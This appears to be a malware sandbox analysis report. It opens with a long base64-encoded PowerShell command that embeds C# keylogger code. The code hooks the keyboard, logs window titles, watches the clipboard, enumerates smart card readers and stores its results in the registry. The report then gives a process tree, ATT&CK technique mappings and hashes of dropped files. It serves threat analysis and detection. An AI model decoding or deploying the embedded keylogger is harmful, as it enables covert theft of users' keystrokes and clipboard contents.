QAZQByACAAbQA1ADQAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGIAeQB0AGUAWwBdACAAYwA1ADUAIAAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwAyADUANQBdADsAaQBmACAAKABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAYwA1ADUAKQApAHsAdQBpAG4AdAAgAGsANQA2ACAAPQAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABiADUAMQAsACAAMwApADsAbQAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwB1AGkAbgB0ACAAcAA1ADcAIAA9ACAAMAA7AHUAaQBuAHQAIABkADUAOAAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAG0AMQAyACwAIAByAGUAZgAgAHAANQA3ACkAOwB1AGkAbgB0ACAAbAA1ADkAIAA9ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAZAA1ADgAKQA7AGkAZgAgACgAYgA1ADIAIAB8AHwAIABoADUAMwAgAHwAfAAgACgAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAYgA1ADEALAAgAGsANQA2ACwAIABjADUANQAsACAAbQA1ADQALAAgAG0ANQA0AC4AQwBhAHAAYQBjAGkAdAB5ACwAIAAoAHUAaQBuAHQAKQAwACwAIABsADUAOQApACAAPgAgADAAKQApAHsAaQBuAHQAIABiADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAbQAxADIAKQA7AG8AMQA1ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGIAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABtADEAMgAsACAAbwAxADUALAAgAGIAMwA3ACAAKwAgADEAKQA7AGkAZgAgACgAKABwADUANwAgACEAPQAgAGMAMQA0ACkAIAB8AHwAIAAoAG0AMQAyACAAIQA9ACAAbgAxADMAKQAgAHwAfAAgACgAaAAxADYALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAIQA9ACAAbwAxADUALgBUAG8AUwB0AHIAaQBuAGcAKAApACkAKQB7AGQANAAxACgAaAAxADYALAAgAGUAMgA1ACwAIABnADEANwApADsAaAAxADYALgBSAGUAbQBvAHYAZQAoADAALAAgAGgAMQA2AC4ATABlAG4AZwB0AGgAKQA7AGgAMQA2AC4AQQBwAHAAZQBuAGQAKABvADEANQApADsAZwAxADcALgBSAGUAbQBvAHYAZQAoADAALAAgAGcAMQA3AC4ATABlAG4AZwB0AGgAKQA7AG4AMQAzACAAPQAgAG0AMQAyADsAUAByAG8AYwBlAHMAcwAgAG4AMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAcAA1ADcAKQA7AGkAZgAgACgAbgAzADgAIAAhAD0AIABuAHUAbABsACkAIABlADIANQAgAD0AIABuADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGUAMgA1ACAAPQAgACIAIgA7AGMAMQA0ACAAPQAgAHAANQA3ADsAfQBpAGYAIAAoAGIANQAxACAAPgAgADcAKQB7AGkAZgAgACgAYgA1ADIAKQAgAGcAMQA3AC4AQQBwAHAAZQBuAGQAKAAiAFsAqwBdACIAKQA7AGUAbABzAGUAIABpAGYAIAAoAGgANQAzACkAIABnADEANwAuAEEAcABwAGUAbgBkACgAIgBbAGQAZQBsAF0AIgApADsAZQBsAHMAZQAgAGcAMQA3AC4AQQBwAHAAZQBuAGQAKABtADUANAApADsAfQB9AH0AfQByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAGQAOQAsACAAYQA0ADgALAAgAGIANAA5ACwAIABmADUAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAgAGUANgAwACgAYgB5AHQAZQBbAF0AIABtADYAMQApAHsAcwB0AHIAaQBuAGcAIABsADYAMgAgAD0AIABFAG4AYwBvAGQAaQBuAGcALgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAG0ANgAxACkAOwBpAGYAIAAoAHMAdAByAGkAbgBnAC4ASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoAGwANgAyACkAKQAgAHIAZQB0AHUAcgBuACAAbgBlAHcAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAoACkAOwByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKABsADYAMgAuAFMAcABsAGkAdAAoAG4AZQB3ACAAYwBoAGEAcgBbAF0AIAB7ACAAJwBcADAAJwAgAH0ALAAgAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAC4AUgBlAG0AbwB2AGUARQBtAHAAdAB5AEUAbgB0AHIAaQBlAHMAKQApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB1AGkAbgB0ACAAawA4ACgASQBuAHQAUAB0AHIAIABoADYAMwApAHsAYgBvAG8AbAAgAGkANgA0ACAAPQAgAHQAcgB1AGUAOwBzAHQAcgBpAG4AZwAgAGUANgA1ADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGMANgA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwB3AGgAaQBsAGUAIAAoAGkANgA0ACkAewBzAHQAcgBpAG4AZwAgAGUANgA3ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEcAZQB0AFYAYQBsAHUAZQAoAGsAMgAwACwAIABtADIAMwAsACAAIgAiACkALgBUAG8AUwB0AHIAaQBuAGcAKAApADsAaQBmACAAKABlADYANwAgACEAPQAgACIAIgApAHsAUgBlAGcAaQBzAHQAcgB5AEsAZQB5ACAAYwA2ADgAIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4AQwB1AHIAcgBlAG4AdABVAHMAZQByAC4ATwBwAGUAbgBTAHUAYgBLAGUAeQAoAGIAMQA5ACwAIAB0AHIAdQBlACkAOwBpAGYAIAAoAGMANgA4ACAAIQA9ACAAbgB1AGwAbAApAHsAYwA2ADgALgBEAGUAbABlAHQAZQBWAGEAbAB1AGUAKABtADIAMwApADsAYwA2ADgALgBDAGwAbwBzAGUAKAApADsAfQBFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwB9AGkAZgAgACgAQwBsAGkAcABiAG8AYQByAGQALgBDAG8AbgB0AGEAaQBuAHMAVABlAHgAdAAoACkAIAA9AD0AIAB0AHIAdQBlACkAewBlADYANQAgAD0AIABDAGwAaQBwAGIAbwBhAHIAZAAuAEcAZQB0AFQAZQB4AHQAKAApADsAaQBmACAAKABlADYANQAgACEAPQAgAG8AMQA4ACkAewBzAHQAcgBpAG4AZwAgAG8ANgA5ACAAPQAgACIAIgA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABkADcAMAAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAbQAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwBpAGYAIAAoAG0AMQAyACAAIQA9ACAAMAApAHsAaQBuAHQAIABiADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAbQAxADIAKQA7AGQANwAwAC4AQwBhAHAAYQBjAGkAdAB5ACAAPQAgAGIAMwA3ACAAKwAgADEAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbQAxADIALAAgAGQANwAwACwAIABiADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAXwBwAHIAbwBjAF8AaQBkAF8AIAA9ACAAMAA7AGkAZgAgACgARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABtADEAMgAsACAAcgBlAGYAIABfAHAAcgBvAGMAXwBpAGQAXwApACAAIQA9ACAAMAApAHsAUAByAG8AYwBlAHMAcwAgAGYANwAxACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAXwBwAHIAbwBjAF8AaQBkAF8AKQA7AGkAZgAgACgAZgA3ADEAIAAhAD0AIABuAHUAbABsACkAIABvADYAOQAgAD0AIABmADcAMQAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7AH0AfQBkADcAMAAuAEEAcABwAGUAbgBkACgAIgAgADoAOgAgAEMAbABpAHAAYgBvAGEAcgBkACIAKQA7AGMANgA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABjADYANgAuAEwAZQBuAGcAdABoACkAOwBjADYANgAuAEEAcABwAGUAbgBkACgAZQA2ADUAKQA7AGQANAAxACgAZAA3ADAALAAgAG8ANgA5ACwAIABjADYANgApADsAbwAxADgAIAA9ACAAZQA2ADUAOwB9AH0AcwB0AHIAaQBuAGcAIABjADcAMgAgAD0AIAAiACIAOwBiADIAOAAgAG8ANwAzADsAaQBmACAAKABkADIANwAgACEAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApAHsAdQBpAG4AdAAgAGEANwA0ACAAPQAgADEAMAAwADAAMAA7AGIAeQB0AGUAWwBdACAAaAA3ADUAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAYQA3ADQAXQA7AGkAZgAgACgAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAGQAMgA3ACwAIABuAHUAbABsACwAIABoADcANQAsACAAbwB1AHQAIABhADcANAApACAAPQA9ACAAMAApAHsATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABtADcANgAgAD0AIABlADYAMAAoAGgANwA1ACkAOwBpAG4AdAAgAGYANwA3ACAAPQAgAG0ANwA2AC4AQwBvAHUAbgB0ADsAaQBmACAAKABmADcANwAgAD4AIAAwACkAewBpAG4AdAAgAGMANwA4ACAAPQAgADAAOwBiADIAOABbAF0AIABiADcAOQAgAD0AIABuAGUAdwAgAGIAMgA4AFsAZgA3ADcAXQA7AGYAbwByAGUAYQBjAGgAIAAoAHMAdAByAGkAbgBnACAAbAA4ADAAIABpAG4AIABtADcANgApAHsAYgA3ADkAWwBjADcAOABdAC4AbQAyADkAIAA9ACAAbAA4ADAAOwBjADcAOAArACsAOwB9AGkAZgAgACgAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgAZAAyADcALAAgADUAMAAwACwAIABiADcAOQAsACAAYgA3ADkALgBMAGUAbgBnAHQAaAApACAAPQA9ACAAMAApAHsAZgBvAHIAIAAoAGkAbgB0ACAAZAA4ADEAIAA9ACAAMAA7ACAAZAA4ADEAIAA8ACAAZgA3ADcAOwAgAGQAOAAxACsAKwApAHsAbwA3ADMAIAA9ACAAYgA3ADkAWwBkADgAMQBdADsAYwA3ADIAIAArAD0AIABvADcAMwAuAG0AMgA5ADsAaQBmACAAKAAoAG8ANwAzAC4AZgAzADIAIAAmACAAMAB4ADAAMAAwADAAMAAwADIAMAApACAAIQA9ACAAMAApACAAYwA3ADIAIAArAD0AIAAiACAALQAgAGYAbwB1AG4AZAAiADsAYwA3ADIAIAArAD0AIAAiAFwAcgBcAG4AIgA7AH0AfQB9AH0AfQBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABrADIAMAAsACAAYQAyADIALAAgAGMANwAyACkAOwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQALgBTAGwAZQBlAHAAKAAxADAAMAAwACkAOwB9AHIAZQB0AHUAcgBuACAAMAA7AH0AWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAGkAbgB0ACAAawA4ADIALAAgAGgAMwAgAGwAOAAzACwAIABJAG4AdABQAHQAcgAgAGEAOAA0ACwAIAB1AGkAbgB0ACAAaAA4ADUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVQBuAGgAbwBvAGsAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAbQA4ADYAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAbQA4ADYALAAgAGkAbgB0ACAAYQA0ADgALAAgAEkAbgB0AFAAdAByACAAYgA0ADkALAAgAEkAbgB0AFAAdAByACAAZgA1ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAHMAdAByAGkAbgBnACAAZwA4ADcAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAGkAbgB0ACAAaQA4ADgALAAgAHUAaQBuAHQAIABwADgAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABLAGUAeQBiAG8AYQByAGQATABhAHkAbwB1AHQAKAB1AGkAbgB0ACAAbAA5ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAaQBuAHQAIABtADkAMQAsACAAdQBpAG4AdAAgAGkAOQAyACwAIABiAHkAdABlAFsAXQAgAGQAOQAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAaQA5ADQALAAgAGkAbgB0ACAAbwA5ADUALAAgAHUAaQBuAHQAIABoADkANgAsACAAdQBpAG4AdAAgAG4AOQA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKABiAHkAdABlAFsAXQAgAGoAOQA4ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAHUAaQBuAHQAIABtADkAOQAsACAAcgBlAGYAIAB1AGkAbgB0ACAAbwAxADAAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAHUAaQBuAHQAIABwADEAMAAxACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKAB1AGkAbgB0ACAAcAAxADAAMQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGEAMQAwADIALAAgAGkAbgB0ACAAYQAxADAAMwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGMAMQAwADQALAAgAHUAaQBuAHQAIABrADEAMAA1ACwAIABjADYAIABrADEAMAA2ACwAIABJAG4AdABQAHQAcgAgAGkAMQAwADcALAAgAHUAaQBuAHQAIABvADEAMAA4ACwAIABJAG4AdABQAHQAcgAgAG4AMQAwADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAEUAeABpAHQAUAByAG8AYwBlAHMAcwAoAHUAaQBuAHQAIABpADEAMQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAgAGEAMQAxADEALAAgAGIAbwBvAGwAIABlADEAMQAyACwAIABzAHQAcgBpAG4AZwAgAHAAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE8AcABlAG4ATQB1AHQAZQB4ACgAdQBpAG4AdAAgAGgAMQAxADQALAAgAGIAbwBvAGwAIABlADEAMQA1ACwAIABzAHQAcgBpAG4AZwAgAHAAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoAEkAbgB0ADMAMgAgAG0AMQAxADYALAAgAEkAbgB0AFAAdAByACAAaQAxADEANwAsACAASQBuAHQAUAB0AHIAIABsADEAMQA4ACwAIABvAHUAdAAgAEkAbgB0AFAAdAByACAAbAAxADEAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAQQAiACwAIABDAGgAYQByAFMAZQB0ACAAPQAgAEMAaABhAHIAUwBlAHQALgBBAG4AcwBpACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAEkAbgB0AFAAdAByACAAbAAxADEAOQAsACAAYgB5AHQAZQBbAF0AIABjADEAMgAwACwAIABiAHkAdABlAFsAXQAgAGoAMQAyADEALAAgAG8AdQB0ACAAVQBJAG4AdAAzADIAIABhADEAMgAyACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgASQBuAHQAUAB0AHIAIABsADEAMQA5ACwAIABVAEkAbgB0ADMAMgAgAGUAMQAyADMALAAgAFsASQBuACwAIABPAHUAdABdACAAYgAyADgAWwBdACAAYgA3ADkALAAgAEkAbgB0ADMAMgAgAGEAMQAyADQAKQA7AH0AfQANAAoAIgBAACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBbAGQAMQAuAGYAMgBdADoAOgBSAHUAbgAoACAAewAgACQAbgB1AGwAbAAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrACAAfQAgACkA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4408
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w0rrwch1\w0rrwch1.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1296
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC5B.tmp" "c:\Users\Admin\AppData\Local\Temp\w0rrwch1\CSCDC600DB90744479D20539EDA17C7F7.TMP"
    3⤵
    PID:1616

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4956

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
4159a1e4cdb933bb4113c92bb68a1b73

SHA1
38b5868314a63083eb27f41d69780eafe1006d2b

SHA256
715d86b01287c88ec10be605030c674fad9236d46dda91cdb16664bfb8728864

SHA512
78b5e59c5e316bfc1844c5b3ed9238857dc59ea1686d6af3f586e7207b0c429cad005eb9fd82f7567639645b5f95f5fef1aba0aa06db80eed35bd7dde071ad80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
bc905611b34df1edd39f39e7fe52bee7

SHA1
bf04af8a420c68ee01171c2755f4da8104aa7a53

SHA256
101860fb83184090388637f02b0e1ede07905d05505a8b476c4d6ff71a75b235

SHA512
04f46f24a58d299116e11a2f0f8cd35d0519e01327bd7d3ebc47cfec0dc7264938724f0b9eb6ffdbe6bb75c06cc661844e845033cf5ba32cd39f4b59e7c9ce05

Download Submit
C:\Users\Admin\AppData\Local\Temp\2346210024

Filesize
41KB

MD5
c4d2d117803c4f2a631087eb2ade30a6

SHA1
ff32d1b965a2f5956639b6540e5c2d15e7f289d9

SHA256
375e8265900a3c4acebd38bdcd959efa80ccc73a47003eef7b6fc019bfd118c8

SHA512
ae85c1b6f948cf298ae498b653ee3435a96b4dd1cde65f0edb426b8c0d596f14b6bc8c5b7598278e6779f1b38f2158ade30b9dbba7c9b0dad04fb83c616b1ab7

Download Submit
C:\Users\Admin\AppData\Local\Temp\985221155

Filesize
56KB

MD5
1c37c2731abd3a8922a8c5069567334b

SHA1
9700fdbd1daf9ecfc48512487a6f413ad676fc6b

SHA256
0b7da98101170c42365b0cf2ae2b1b86c5ea035731e46a951fd729fb7bb7a019

SHA512
32a506027f699221179ae91190274f13c268a129f3da456c5839790292f50e95f4cdc88da3c0788739524851d3a1119801c17d396f3e380e6b0409453941f666

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDC5B.tmp

Filesize
1KB

MD5
1f2b9e94ca499d612094bfec63af6fea

SHA1
488f870a577251a554436aa293a8a6368b88b331

SHA256
a01d7f5b99c83de76dd3e62554aaa4118ba474ad793cec1f2d912383b8b6d7b4

SHA512
ae415d309e861a31450ef8b10bac0aa653e0058958c019fd35ec23d0a76e2fea6a97eeb16424d85ae985904eb7b46bddb38774e20362db7958c60713fd1a4f96

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hkqhiorp.0t1.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

Filesize
13KB

MD5
0a235e8362613509efd31bfdbb22f978

SHA1
8bcb0297001dfd4963e8d17270ad0d2024a96912

SHA256
175c6cc0a98c16f18e333b5622415d3d962a5d1c05044d34823c8541d6abfcd5

SHA512
bb2cf2457ba063c971c9944f9a6fda4a89eab80265e270f6371a826bdfc753a62828c83f984897127f213837adb8f90956263dd51823e270c5081fafea630db4

Download Submit
C:\Users\Admin\AppData\Local\Temp\w0rrwch1\w0rrwch1.dll

Filesize
9KB

MD5
8c2965d3a244c8f91bbce979ee44c586

SHA1
065fb61d85d4437182d4dc754e7a12fe7514a99f

SHA256
92fe694ceba32e1ed0066ba15ee51cdcb5dea205fb7f468049c90a164ebd1cd0

SHA512
31ce6b2d633854dbf163577b45b43a84b4bb898aec4d61f0594a11ce3c43a467d043e59dfecb4fc962bc427c2ec3649680396dec07e0f709a2abb9d7922ea266

Download Submit
C:\Users\Admin\AppData\Local\b7769dd90.js

Filesize
56KB

MD5
1c37c2731abd3a8922a8c5069567334b

SHA1
9700fdbd1daf9ecfc48512487a6f413ad676fc6b

SHA256
0b7da98101170c42365b0cf2ae2b1b86c5ea035731e46a951fd729fb7bb7a019

SHA512
32a506027f699221179ae91190274f13c268a129f3da456c5839790292f50e95f4cdc88da3c0788739524851d3a1119801c17d396f3e380e6b0409453941f666

Download Submit
C:\Users\Admin\AppData\Local\dynwrapx.dll

Filesize
13KB

MD5
ca820517f8fd74d21944d846df6b7c20

SHA1
1f87eeb37156d64de97d042b9bcfbaf185f8737d

SHA256
1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

SHA512
